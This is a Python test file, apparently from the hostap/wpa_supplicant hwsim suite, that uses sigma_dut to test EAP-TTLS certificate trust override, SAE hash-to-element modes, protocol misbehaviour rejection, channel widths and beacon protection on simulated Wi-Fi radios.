def run_sigma_dut_eap_ttls_uosc_tod(dev, apdev, params, tofu):
check_tls_tod(dev[0])
logdir = params['logdir']
name = "sigma_dut_eap_ttls_uosc_tod"
if tofu:
name += "_tofu"
with open("auth_serv/ca.pem", "r") as f:
with open(os.path.join(logdir, name + ".ca.pem"), "w") as f2:
f2.write(f.read())
if tofu:
src = "auth_serv/server-certpol2.pem"
else:
src = "auth_serv/server-certpol.pem"
dst = os.path.join(logdir, name + ".server.der")
hashdst = os.path.join(logdir, name + ".server.pem.sha256")
subprocess.check_call(["openssl", "x509", "-in", src, "-out", dst,
"-outform", "DER"],
stderr=open('/dev/null', 'w'))
with open(dst, "rb") as f:
der = f.read()
hash = hashlib.sha256(der).digest()
with open(hashdst, "w") as f:
f.write(binascii.hexlify(hash).decode())
ssid = "test-wpa2-eap"
params = int_eap_server_params()
params["ssid"] = ssid
if tofu:
params["server_cert"] = "auth_serv/server-certpol2.pem"
params["private_key"] = "auth_serv/server-certpol2.key"
else:
params["server_cert"] = "auth_serv/server-certpol.pem"
params["private_key"] = "auth_serv/server-certpol.key"
hapd = hostapd.add_ap(apdev[0], params)
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname, cert_path=logdir)
try:
cmd = ("sta_set_security,type,eapttls,interface,%s,ssid,%s,keymgmttype,wpa2,encType,AES-CCMP,PairwiseCipher,AES-CCMP-128,trustedRootCA," + name + ".ca.pem,username,DOMAIN\mschapv2 user,password,password,ServerCert," + name + ".server.pem") % (ifname, ssid)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check(cmd)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, ssid),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname + ",maintain_profile,1")
dev[0].wait_disconnected()
dev[0].dump_monitor()
hapd.disable()
params = hostapd.wpa2_eap_params(ssid=ssid)
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, ssid),
timeout=10)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-TLS-CERT-ERROR"], timeout=10)
if ev is None:
raise Exception("Server certificate error not reported")
res = sigma_dut_cmd_check("dev_exec_action,program,WPA3,interface,%s,ServerCertTrust,Accept" % ifname)
if "ServerCertTrustResult,Accepted" in res:
raise Exception("Server certificate trust override was accepted unexpectedly")
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
dev[0].dump_monitor()
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_eap_ttls_uosc_initial_tod_strict(dev, apdev, params):
"""sigma_dut controlled STA and EAP-TTLS with initial UOSC/TOD-STRICT"""
run_sigma_dut_eap_ttls_uosc_initial_tod(dev, apdev, params, False)
def test_sigma_dut_eap_ttls_uosc_initial_tod_tofu(dev, apdev, params):
"""sigma_dut controlled STA and EAP-TTLS with initial UOSC/TOD-TOFU"""
run_sigma_dut_eap_ttls_uosc_initial_tod(dev, apdev, params, True)
def run_sigma_dut_eap_ttls_uosc_initial_tod(dev, apdev, params, tofu):
check_tls_tod(dev[0])
logdir = params['logdir']
name = params['name']
with open("auth_serv/rsa3072-ca.pem", "r") as f:
with open(params['prefix'] + ".ca.pem", "w") as f2:
f2.write(f.read())
if tofu:
src = "auth_serv/server-certpol2.pem"
else:
src = "auth_serv/server-certpol.pem"
dst = params['prefix'] + ".server.der"
hashdst = params['prefix'] + ".server.pem.sha256"
subprocess.check_call(["openssl", "x509", "-in", src, "-out", dst,
"-outform", "DER"],
stderr=open('/dev/null', 'w'))
with open(dst, "rb") as f:
der = f.read()
hash = hashlib.sha256(der).digest()
with open(hashdst, "w") as f:
f.write(binascii.hexlify(hash).decode())
ssid = "test-wpa2-eap"
params = int_eap_server_params()
params["ssid"] = ssid
if tofu:
params["server_cert"] = "auth_serv/server-certpol2.pem"
params["private_key"] = "auth_serv/server-certpol2.key"
else:
params["server_cert"] = "auth_serv/server-certpol.pem"
params["private_key"] = "auth_serv/server-certpol.key"
hapd = hostapd.add_ap(apdev[0], params)
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname, cert_path=logdir)
try:
cmd = ("sta_set_security,type,eapttls,interface,%s,ssid,%s,keymgmttype,wpa2,encType,AES-CCMP,PairwiseCipher,AES-CCMP-128,trustedRootCA," + name + ".ca.pem,username,DOMAIN\mschapv2 user,password,password") % (ifname, ssid)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check(cmd)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, ssid),
timeout=10)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-TLS-CERT-ERROR"], timeout=15)
if ev is None:
raise Exception("Server certificate validation failure not reported")
res = sigma_dut_cmd_check("dev_exec_action,program,WPA3,interface,%s,ServerCertTrust,Accept" % ifname)
if not tofu and "ServerCertTrustResult,Accepted" in res:
raise Exception("Server certificate trust override was accepted unexpectedly")
if tofu and "ServerCertTrustResult,Accepted" not in res:
raise Exception("Server certificate trust override was not accepted")
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
dev[0].dump_monitor()
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_eap_ttls_uosc_ca_mistrust(dev, apdev, params):
"""sigma_dut controlled STA and EAP-TTLS with UOSC when CA is not trusted"""
check_domain_suffix_match(dev[0])
logdir = params['logdir']
with open("auth_serv/ca.pem", "r") as f:
with open(os.path.join(logdir,
"sigma_dut_eap_ttls_uosc_ca_mistrust.ca.pem"),
"w") as f2:
f2.write(f.read())
ssid = "test-wpa2-eap"
params = int_eap_server_params()
params["ssid"] = ssid
params["ca_cert"] = "auth_serv/rsa3072-ca.pem"
params["server_cert"] = "auth_serv/rsa3072-server.pem"
params["private_key"] = "auth_serv/rsa3072-server.key"
hapd = hostapd.add_ap(apdev[0], params)
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname, cert_path=logdir)
try:
cmd = "sta_set_security,type,eapttls,interface,%s,ssid,%s,keymgmttype,wpa2,encType,AES-CCMP,PairwiseCipher,AES-CCMP-128,trustedRootCA,sigma_dut_eap_ttls_uosc_ca_mistrust.ca.pem,username,DOMAIN\mschapv2 user,password,password,domainSuffix,w1.fi" % (ifname, ssid)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check(cmd)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, ssid),
timeout=10)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-TLS-CERT-ERROR"], timeout=10)
if ev is None:
raise Exception("Server certificate error not reported")
res = sigma_dut_cmd_check("dev_exec_action,program,WPA3,interface,%s,ServerCertTrust,Accept" % ifname)
if "ServerCertTrustResult,Accepted" not in res:
raise Exception("Server certificate trust was not accepted")
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
dev[0].dump_monitor()
finally:
stop_sigma_dut(sigma)
def start_sae_pwe_ap(apdev, sae_pwe):
ssid = "test-sae"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
params['sae_groups'] = '19'
params['sae_pwe'] = str(sae_pwe)
return hostapd.add_ap(apdev, params)
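# hostapd's sae_pwe parameter selects the SAE PWE derivation method:
# 0 = hunting-and-pecking loop only, 1 = hash-to-element (H2E) only,
# 2 = both enabled. The helpers below exercise sigma_dut against APs
# configured with each of these modes.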
def connect_sae_pwe_sta(dev, ifname, extra=None):
dev.dump_monitor()
sigma_dut_cmd_check("sta_reset_default,interface,%s" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
cmd = "sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2" % (ifname, "test-sae", "12345678")
if extra:
cmd += "," + extra
sigma_dut_cmd_check(cmd)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
dev.wait_disconnected()
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
dev.dump_monitor()
def no_connect_sae_pwe_sta(dev, ifname, extra=None):
dev.dump_monitor()
sigma_dut_cmd_check("sta_reset_default,interface,%s" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
cmd = "sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2" % (ifname, "test-sae", "12345678")
if extra:
cmd += "," + extra
sigma_dut_cmd_check(cmd)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"),
timeout=10)
ev = dev.wait_event(["CTRL-EVENT-CONNECTED",
"CTRL-EVENT-NETWORK-NOT-FOUND"], timeout=10)
if ev is None or "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected connection result")
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
dev.dump_monitor()
def test_sigma_dut_sae_h2e(dev, apdev):
"""sigma_dut controlled SAE H2E association (AP using loop+H2E)"""
check_sae_capab(dev[0])
start_sae_pwe_ap(apdev[0], 2)
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname, sae_h2e=True)
try:
connect_sae_pwe_sta(dev[0], ifname)
connect_sae_pwe_sta(dev[0], ifname, extra="sae_pwe,h2e")
connect_sae_pwe_sta(dev[0], ifname, extra="sae_pwe,loop")
res = sigma_dut_cmd("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2,sae_pwe,unknown" % (ifname, "test-sae", "12345678"))
if res != "status,ERROR,errorCode,Unsupported sae_pwe value":
raise Exception("Unexpected error result: " + res)
finally:
stop_sigma_dut(sigma)
dev[0].set("sae_pwe", "0")
def test_sigma_dut_sae_h2e_ap_loop(dev, apdev):
"""sigma_dut controlled SAE H2E association (AP using loop-only)"""
check_sae_capab(dev[0])
start_sae_pwe_ap(apdev[0], 0)
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname, sae_h2e=True)
try:
connect_sae_pwe_sta(dev[0], ifname)
connect_sae_pwe_sta(dev[0], ifname, extra="sae_pwe,loop")
no_connect_sae_pwe_sta(dev[0], ifname, extra="sae_pwe,h2e")
finally:
stop_sigma_dut(sigma)
dev[0].set("sae_pwe", "0")
def test_sigma_dut_sae_h2e_ap_h2e(dev, apdev):
"""sigma_dut controlled SAE H2E association (AP using H2E-only)"""
check_sae_capab(dev[0])
start_sae_pwe_ap(apdev[0], 1)
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname, sae_h2e=True)
try:
connect_sae_pwe_sta(dev[0], ifname)
no_connect_sae_pwe_sta(dev[0], ifname, extra="sae_pwe,loop")
connect_sae_pwe_sta(dev[0], ifname, extra="sae_pwe,h2e")
finally:
stop_sigma_dut(sigma)
dev[0].set("sae_pwe", "0")
def test_sigma_dut_ap_sae_h2e(dev, apdev, params):
"""sigma_dut controlled AP with SAE H2E"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_sae_h2e.sigma-hostapd")
check_sae_capab(dev[0])
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, sae_h2e=True, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK,12345678")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
for sae_pwe in [0, 1, 2]:
dev[0].request("SET sae_groups ")
dev[0].set("sae_pwe", str(sae_pwe))
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", scan_freq="2412")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].dump_monitor()
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
dev[0].set("sae_pwe", "0")
def test_sigma_dut_ap_sae_h2e_only(dev, apdev, params):
"""sigma_dut controlled AP with SAE H2E-only"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_sae_h2e.sigma-hostapd")
check_sae_capab(dev[0])
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, sae_h2e=True, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK,12345678,sae_pwe,h2e")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].request("SET sae_groups ")
dev[0].set("sae_pwe", "1")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", scan_freq="2412")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].dump_monitor()
dev[0].set("sae_pwe", "0")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", scan_freq="2412", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED",
"CTRL-EVENT-NETWORK-NOT-FOUND"], timeout=10)
dev[0].request("DISCONNECT")
if ev is None or "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected connection result")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
dev[0].set("sae_pwe", "0")
def test_sigma_dut_ap_sae_loop_only(dev, apdev, params):
"""sigma_dut controlled AP with SAE looping-only"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_sae_h2e.sigma-hostapd")
check_sae_capab(dev[0])
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, sae_h2e=True, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK,12345678,sae_pwe,loop")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].request("SET sae_groups ")
dev[0].set("sae_pwe", "0")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", scan_freq="2412")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].dump_monitor()
dev[0].set("sae_pwe", "1")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", scan_freq="2412", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED",
"CTRL-EVENT-NETWORK-NOT-FOUND"], timeout=10)
dev[0].request("DISCONNECT")
if ev is None or "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected connection result")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
dev[0].set("sae_pwe", "0")
def test_sigma_dut_sae_h2e_loop_forcing(dev, apdev):
"""sigma_dut controlled SAE H2E misbehavior with looping forced"""
check_sae_capab(dev[0])
ssid = "test-sae"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
params['sae_pwe'] = '1'
hapd = hostapd.add_ap(apdev[0], params)
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
sigma_dut_cmd_check("sta_reset_default,interface,%s" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2,IgnoreH2E_RSNXE_BSSMemSel,1" % (ifname, "test-sae", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"),
timeout=10)
ev = dev[0].wait_event(["SME: Trying to authenticate with"], timeout=10)
if ev is None:
raise Exception("No authentication attempt reported")
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED"], timeout=0.5)
if ev is not None:
raise Exception("Unexpected connection reported")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_sae_h2e_enabled_group_rejected(dev, apdev):
"""sigma_dut controlled SAE H2E misbehavior with rejected groups"""
check_sae_capab(dev[0])
ssid = "test-sae"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
params['sae_groups'] = "19 20"
params['sae_pwe'] = '1'
hapd = hostapd.add_ap(apdev[0], params)
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname, sae_h2e=True)
try:
sigma_dut_cmd_check("sta_reset_default,interface,%s" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2,ECGroupID_RGE,19 123" % (ifname, "test-sae", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"),
timeout=10)
ev = dev[0].wait_event(["SME: Trying to authenticate with"], timeout=10)
if ev is None:
raise Exception("No authentication attempt reported")
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED"], timeout=0.5)
if ev is not None:
raise Exception("Unexpected connection reported")
finally:
stop_sigma_dut(sigma)
dev[0].set("sae_pwe", "0")
def test_sigma_dut_sae_h2e_rsnxe_mismatch(dev, apdev):
"""sigma_dut controlled SAE H2E misbehavior with RSNXE"""
check_sae_capab(dev[0])
ssid = "test-sae"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
params['sae_groups'] = "19"
params['sae_pwe'] = '1'
hapd = hostapd.add_ap(apdev[0], params)
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname, sae_h2e=True)
try:
sigma_dut_cmd_check("sta_reset_default,interface,%s" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2,RSNXE_Content,EapolM2:F40100" % (ifname, "test-sae", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"),
timeout=10)
ev = dev[0].wait_event(["SME: Trying to authenticate with"], timeout=10)
if ev is None:
raise Exception("No authentication attempt reported")
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED"], timeout=0.5)
if ev is not None:
raise Exception("Unexpected connection reported")
finally:
stop_sigma_dut(sigma)
dev[0].set("sae_pwe", "0")
def test_sigma_dut_ap_sae_h2e_rsnxe_mismatch(dev, apdev, params):
"""sigma_dut controlled SAE H2E AP misbehavior with RSNXE"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_sae_h2e_rsnxe_mismatch.sigma-hostapd")
check_sae_capab(dev[0])
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, sae_h2e=True, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK,12345678,sae_pwe,h2e,RSNXE_Content,EapolM3:F40100")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].request("SET sae_groups ")
dev[0].set("sae_pwe", "1")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", scan_freq="2412", wait_connect=False)
ev = dev[0].wait_event(["Associated with"], timeout=10)
if ev is None:
raise Exception("No indication of association seen")
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED",
"CTRL-EVENT-DISCONNECTED"], timeout=10)
dev[0].request("DISCONNECT")
if ev is None:
raise Exception("No disconnection seen")
if "CTRL-EVENT-DISCONNECTED" not in ev:
raise Exception("Unexpected connection")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
dev[0].set("sae_pwe", "0")
def test_sigma_dut_ap_sae_h2e_group_rejection(dev, apdev, params):
"""sigma_dut controlled AP with SAE H2E-only and group rejection"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_sae_h2e_group_rejection.sigma-hostapd")
check_sae_capab(dev[0])
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, sae_h2e=True, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK,12345678,sae_pwe,h2e")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].request("SET sae_groups 21 20 19")
dev[0].set("sae_pwe", "1")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", scan_freq="2412")
addr = dev[0].own_addr()
res = sigma_dut_cmd_check("dev_exec_action,program,WPA3,Dest_MAC,%s,Rejected_DH_Groups,1" % addr)
if "DHGroupVerResult,21 20" not in res:
raise Exception("Unexpected dev_exec_action response: " + res)
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
dev[0].set("sae_pwe", "0")
def test_sigma_dut_ap_sae_h2e_anti_clogging(dev, apdev, params):
"""sigma_dut controlled AP with SAE H2E and anti-clogging token"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_sae_h2e_anti_clogging.sigma-hostapd")
check_sae_capab(dev[0])
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, sae_h2e=True, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,SAE,PSK,12345678,AntiCloggingThreshold,0")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].set("sae_groups", "")
dev[0].set("sae_pwe", "2")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
dev[0].set("sae_pwe", "0")
def test_sigma_dut_ap_5ghz(dev, apdev, params):
"""sigma_dut controlled AP on 5 GHz"""
run_sigma_dut_ap_channel(dev, apdev, params, 36, '11na', 5180,
check_signal="WIDTH=20 MHz")
def test_sigma_dut_ap_ht40plus(dev, apdev, params):
"""sigma_dut controlled AP and HT40+"""
run_sigma_dut_ap_channel(dev, apdev, params, 36, '11na', 5180,
extra="width,40", check_signal="WIDTH=40 MHz")
def test_sigma_dut_ap_ht40minus(dev, apdev, params):
"""sigma_dut controlled AP and HT40-"""
run_sigma_dut_ap_channel(dev, apdev, params, 40, '11na', 5200,
extra="width,40", check_signal="WIDTH=40 MHz")
def test_sigma_dut_ap_vht40(dev, apdev, params):
"""sigma_dut controlled AP and VHT40"""
run_sigma_dut_ap_channel(dev, apdev, params, 36, '11ac', 5180,
extra="width,40", check_signal="WIDTH=40 MHz",
program="VHT")
def test_sigma_dut_ap_vht80(dev, apdev, params):
"""sigma_dut controlled AP and VHT80"""
run_sigma_dut_ap_channel(dev, apdev, params, 36, '11ac', 5180,
extra="width,80", check_signal="WIDTH=80 MHz",
program="VHT")
def run_sigma_dut_ap_channel(dev, apdev, params, channel, mode, scan_freq,
extra=None, check_signal=None, program=None):
logdir = params['prefix'] + ".sigma-hostapd"
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
subprocess.call(['iw', 'reg', 'set', 'US'])
cmd = "ap_reset_default"
if program:
cmd += ",program," + program
sigma_dut_cmd_check(cmd)
cmd = "ap_set_wireless,NAME,AP,CHANNEL,%d,SSID,test-psk,MODE,%s" % (channel, mode)
if extra:
cmd += "," + extra
sigma_dut_cmd_check(cmd)
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK,PSK,12345678")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
with open("/tmp/sigma_dut-ap.conf", "rb") as f:
with open(params['prefix'] + ".sigma-conf", "wb") as f2:
f2.write(f.read())
dev[0].connect("test-psk", psk="12345678", scan_freq=str(scan_freq))
sig = dev[0].request("SIGNAL_POLL")
logger.info("SIGNAL_POLL:\n" + sig.strip())
dev[0].request("DISCONNECT")
dev[0].wait_disconnected()
sigma_dut_cmd_check("ap_reset_default")
if check_signal and check_signal not in sig:
raise Exception("Unexpected SIGNAL_POLL data")
finally:
stop_sigma_dut(sigma)
subprocess.call(['iw', 'reg', 'set', '00'])
dev[0].flush_scan_cache()
def test_sigma_dut_beacon_prot(dev, apdev):
"""sigma_dut controlled STA and beacon protection"""
ssid = "test-pmf-required"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params["wpa_key_mgmt"] = "WPA-PSK-SHA256"
params["ieee80211w"] = "2"
params["beacon_prot"] = "1"
try:
hapd = hostapd.add_ap(apdev[0], params)
except Exception as e:
if "Failed to enable hostapd interface" in str(e):
raise HwsimSkip("Beacon protection not supported")
raise
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,PMF" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,type,PSK,passphrase,%s,encpType,aes-ccmp,keymgmttype,wpa2,PMF,Required,BeaconProtection,1" % (ifname, "test-pmf-required", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-pmf-required"),
timeout=10)
sigma_dut_wait_connected(ifname)
time.sleep(1)
check_mac80211_bigtk(dev[0], hapd)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_beacon_prot(dev, apdev, params):
"""sigma_dut controlled AP and beacon protection"""
logdir = params['prefix'] + ".sigma-hostapd"
Wlantest.setup(None)
wt = Wlantest()
wt.flush()
wt.add_passphrase("12345678")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-psk,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK,PSK,12345678,PMF,Required,BeaconProtection,1")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
bssid = sigma_dut_cmd_check("ap_get_mac_address,NAME,AP")
bssid = bssid.split(',')[3]
dev[0].connect("test-psk", key_mgmt="WPA-PSK-SHA256",
psk="12345678", scan_freq="2412",
ieee80211w="2", beacon_prot="1")
time.sleep(1)
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
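    # Verify with wlantest that the AP's beacons carried a valid BIP MMIE,
    # i.e. that beacon protection was actually applied on the air.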
valid_bip = wt.get_bss_counter('valid_bip_mmie', bssid)
invalid_bip = wt.get_bss_counter('invalid_bip_mmie', bssid)
missing_bip = wt.get_bss_counter('missing_bip_mmie', bssid)
logger.info("wlantest BIP counters: valid=%d invalid=%d missing=%d" % (valid_bip, invalid_bip, missing_bip))
if valid_bip < 0 or invalid_bip > 0 or missing_bip > 0:
raise Exception("Unexpected wlantest BIP counters: valid=%d invalid=%d missing=%d" % (valid_bip, invalid_bip, missing_bip))
def test_sigma_dut_ap_transition_disable(dev, apdev, params):
"""sigma_dut controlled AP and transition disabled indication"""
check_sae_capab(dev[0])
logdir = params['prefix'] + ".sigma-hostapd"
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK,12345678,PMF,Required,Transition_Disable,1,Transition_Disable_Index,0")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].set("sae_groups", "")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", scan_freq="2412")
ev = dev[0].wait_event(["TRANSITION-DISABLE"], timeout=1)
if ev is None:
raise Exception("Transition disable not indicated")
